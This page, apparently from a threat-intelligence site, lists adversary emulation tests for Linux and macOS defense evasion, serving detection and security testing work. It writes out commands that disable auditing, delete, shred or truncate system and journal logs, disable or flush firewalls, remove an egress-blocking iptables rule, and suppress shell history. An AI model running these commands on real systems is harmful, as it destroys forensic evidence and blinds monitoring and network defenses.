The command auditctl -e 0 disables the audit system. By setting the parameter to 0, auditing is deactivated, halting the monitoring and recording of security-related events. This action stops the generation of audit logs, ceasing the collection of data regarding system activities. Disabling auditing may be done for various reasons, such as troubleshooting, performance optimization, or temporarily suspending auditing requirements, but it reduces visibility into system events and can impact security monitoring and compliance efforts.
auditctl -e 0
T1685.006 sh elevated macos, linux rm -rf
Clear Linux or Mac System Logs
Delete system and audit logs
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
T1685.006 sh elevated linux rm -rf
Clear Linux or Mac System Logs
Delete messages and security logs
rm -rf /var/log/messages
rm -rf /var/log/security
T1685.006 sh elevated macos Delete log files using built-in log utility
Clear Linux or Mac System Logs
This test deletes main log datastore, inflight log data, time-to-live data(TTL), fault and error content
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
T1685.006 sh elevated macos Truncate system log files via truncate utility
Clear Linux or Mac System Logs
This test truncates the system log files using the truncate utility with (-s 0) parameter which sets file size to zero, thus emptying the file content
sudo truncate -s 0 #{system_log_path} #size parameter shorthand
T1685.006 sh elevated linux Truncate system log files via truncate utility (freebsd)
Clear Linux or Mac System Logs
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
truncate -s 0 /var/log/messages #size parameter shorthand
truncate --size=0 /var/log/security #size parameter
T1685.006 sh elevated macos Delete log files via cat utility by appending /dev/null or /dev/zero
Clear Linux or Mac System Logs
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
T1685.006 sh elevated linux Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
Clear Linux or Mac System Logs
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
cat /dev/null > /var/log/messages #truncating the file to zero bytes
cat /dev/zero > /var/log/messages #log file filled with null bytes(zeros)
T1685.006 sh elevated macos System log file deletion via find utility
Clear Linux or Mac System Logs
This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink)
sudo find /var/log -name '#{system_log_name1}*' -exec rm {} \; #using "rm" execution
sudo find /var/log -name "#{system_log_name2}*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log -name "#{system_log_name3}*" -exec unlink {} \; #using "unlink" execution
T1685.006 sh elevated macos Overwrite macOS system log via echo utility
Clear Linux or Mac System Logs
This test overwrites the contents of system log file with an empty string using echo utility
sudo echo '' > #{system_log_path}
T1685.006 sh elevated linux Overwrite FreeBSD system log via echo utility
Clear Linux or Mac System Logs
This test overwrites the contents of system log file with an empty string using echo utility
echo '' > /var/log/messages
T1685.006 sh elevated macos Real-time system log clearance/deletion
Clear Linux or Mac System Logs
This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process
sudo log -f /var/log/system.log | : > /var/log/system.log
T1685.006 sh elevated macos Delete system log files via unlink utility
Clear Linux or Mac System Logs
This test deletes the system log file using unlink utility
sudo unlink #{system_log_path}
T1685.006 sh elevated linux Delete system log files via unlink utility (freebsd)
Clear Linux or Mac System Logs
This test deletes the messages log file using unlink utility
unlink /var/log/messages
T1685.006 sh elevated macos Delete system log files using shred utility
Clear Linux or Mac System Logs
This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely
sudo shred -u -z -n 3 #{system_log_path}
T1685.006 sh elevated macos Delete system log files using srm utility
Clear Linux or Mac System Logs
This test securely deletes the system log files individually and recursively using the srm utility. Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
sudo srm #{system_log_path} #system log file deletion
sudo srm -r #{system_log_folder} #recursive deletion of log files
T1685.006 sh elevated macos Delete system log files using OSAScript
Clear Linux or Mac System Logs
This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges
osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
T1685.006 sh elevated macos Delete system log files using Applescript
Clear Linux or Mac System Logs
This test deletes the system log file using applescript using osascript via Finder application Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework. Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
T1685.006 sh elevated linux Delete system journal logs via rm and journalctl utilities
Clear Linux or Mac System Logs
The first sub-test deletes the journal files using rm utility in the "/var/log/journal/" directory and the second sub-test clears the journal by modifiying time period of logs that should be retained to zero.
sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
T1686 sh elevated linux Stop/Start UFW firewall
Disable or Modify System Firewall
Stop the Uncomplicated Firewall (UFW) if installed.
ufw disable
T1686 sh elevated linux Stop/Start Packet Filter
Disable or Modify System Firewall
Stop the Packet Filter if installed.
service pf stop
service pf disable
T1686 sh elevated linux Stop/Start UFW firewall systemctl
Disable or Modify System Firewall
Stop the Uncomplicated Firewall (UFW) if installed, using systemctl.
systemctl stop ufw
T1686 sh elevated linux Turn off UFW logging
Disable or Modify System Firewall
Turn off the Uncomplicated Firewall (UFW) logging.
ufw logging off
T1686 sh elevated linux Add and delete UFW firewall rules
Disable or Modify System Firewall
Add and delete a rule on the Uncomplicated Firewall (UFW) if installed and enabled.
ufw prepend deny from 1.2.3.4
ufw status numbered
T1686 sh elevated linux Add and delete Packet Filter rules
Disable or Modify System Firewall
Add and delete a rule on the Packet Filter (PF) if installed and enabled.
echo "block in proto tcp from 1.2.3.4 to any" | pfctl -a pf-rules -f -
pfctl -a pf-rules -s rules
T1686 sh elevated linux Edit UFW firewall user.rules file
Disable or Modify System Firewall
Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
echo "# THIS IS A COMMENT" >> /etc/ufw/user.rules
grep "# THIS IS A COMMENT" /etc/ufw/user.rules
T1686 sh elevated linux Edit UFW firewall ufw.conf file
Disable or Modify System Firewall
Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf which controls if the firewall starts on boot and its logging level.
echo "# THIS IS A COMMENT" >> /etc/ufw/ufw.conf
grep "# THIS IS A COMMENT" /etc/ufw/ufw.conf
T1686 sh elevated linux Edit UFW firewall sysctl.conf file
Disable or Modify System Firewall
Edit the Uncomplicated Firewall (UFW) configuration file for setting network variables /etc/ufw/sysctl.conf.
echo "# THIS IS A COMMENT" >> /etc/ufw/sysctl.conf
grep "# THIS IS A COMMENT" /etc/ufw/sysctl.conf
T1686 sh elevated linux Edit UFW firewall main configuration file
Disable or Modify System Firewall
Edit the Uncomplicated Firewall (UFW) main configuration file for setting default policies /etc/default/ufw.
echo "# THIS IS A COMMENT" >> /etc/default/ufw
grep "# THIS IS A COMMENT" /etc/default/ufw
T1686 sh elevated linux Tail the UFW firewall log file
Disable or Modify System Firewall
Print the last 10 lines of the Uncomplicated Firewall (UFW) log file /var/log/ufw.log.
tail /var/log/ufw.log
T1686 sh elevated linux Disable iptables
Disable or Modify System Firewall
Some Linux systems may not activate ufw, but use iptables for firewall rules instead. (ufw works on top of iptables.) Attackers cannot directly disable iptables, as it is not implemented as a service like ufw. But they can flush all iptables rules, which in fact "disable" iptables.
iptables-save > /tmp/iptables.rules
iptables -F
T1686 sh elevated linux Modify/delete iptables firewall rules
Disable or Modify System Firewall
Instead of completely "disabling" iptables, adversaries may choose to delete a certain rule, which, for example, blocks data exfiltration via ftp. By doing so, they may cause less noise to avoid detection.
iptables -D OUTPUT -p tcp --dport 21 -j DROP
T1690 sh linux, macos Disable history collection
Prevent Command History Logging
Disables history collection in shells
export HISTCONTROL=ignoreboth
#{evil_command}
T1690 sh linux Disable history collection (freebsd)
Prevent Command History Logging
Disables history collection in shells
export HISTSIZE=0
#{evil_command}
T1690 sh linux Setting the HISTSIZE environment variable
Prevent Command History Logging
An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.
echo $HISTSIZE
export HISTSIZE=0
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTSIZE) -eq 0 ]; then echo "\$HISTSIZE is zero"; else HIST_LENGTH=$(wc -l $HISTFILE); echo "\$HISTSIZE is not zero, history size is $HIST_LENGTH";  fi
T1690 sh linux Setting the HISTFILE environment variable (freebsd)
Prevent Command History Logging
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
echo $HISTFILE
export HISTFILE="/dev/null"
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin